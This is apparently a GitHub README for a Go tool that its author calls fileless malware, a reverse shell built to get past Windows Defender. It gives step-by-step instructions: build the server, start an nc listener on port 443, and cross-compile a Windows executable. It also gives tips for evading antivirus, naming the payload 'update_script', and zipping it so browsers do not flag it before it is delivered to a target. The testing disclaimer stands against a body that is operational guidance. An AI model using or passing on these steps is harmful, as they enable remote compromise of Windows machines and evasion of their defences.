/update_script

Fileless "malware" that bypasses Windows Defender using PowerShell and obfuscation

Primary LanguageGo

SecUp "Malware for Learning"

!!! FOR SECURITY TESTING PURPOSES ONLY !!!
******************************************************
DO NOT USE THIS ON SYSTEMS THAT YOU DO NOT
OWN UNLESS YOU HAVE EXPRESS PERMISSION !!!

Fileless malware that bypasses Windows Defender using PowerShell and obfuscation.
Just a simple Reverse Shell using a batch script to kick things off, after which everything is fileless.

YouTube video demonstration and explanation >>> https://youtu.be/LjoAV3O40og

Setup and Execution

  1. Clone this repo
    git clone https://github.com/daniellowrie/update_script
  2. Build SecUp.go
    go build SecUp.go
  3. Run SecUp
    ./SecUp 192.168.1.200
  4. Open another terminal, and start a Listener on port 443 (sudo if not root)
    sudo nc -vnlp 443
  5. Open another terminal, and compile EXE
    GOOS=windows go build update_script.go
  • A word about comipiling for Windows...
    • I've experienced Golang binaries getting flagged as malware, even "Hello, World!"
      • I've read that removing -ldflags and -trimpath may help and that the standard build is best for AV evasion
      • I've also read that packing can trip AV detection as well and again the standard build is best for AV evasion
        • BUT if you'd like to make the binary smaller...
          • GOOS=windows go build -ldflags "-s -w" -trimpath update_script.go
          • upx -9 update_script.exe
  1. Back at the SecUp terminal
    Press ENTER to continue...
  2. Upload and execute update_script.exe to target any way you like
  3. Shellz! :)

I would recommend putting `update_script.exe` in a zip file for transfer to target as most browsers don't like when you download rando exectuables and will complain.

Going to work on building a better mousetrap as this was just a PoC at making something 'malicious' that could bypass Defender.

Update_Script-FINAL.mp4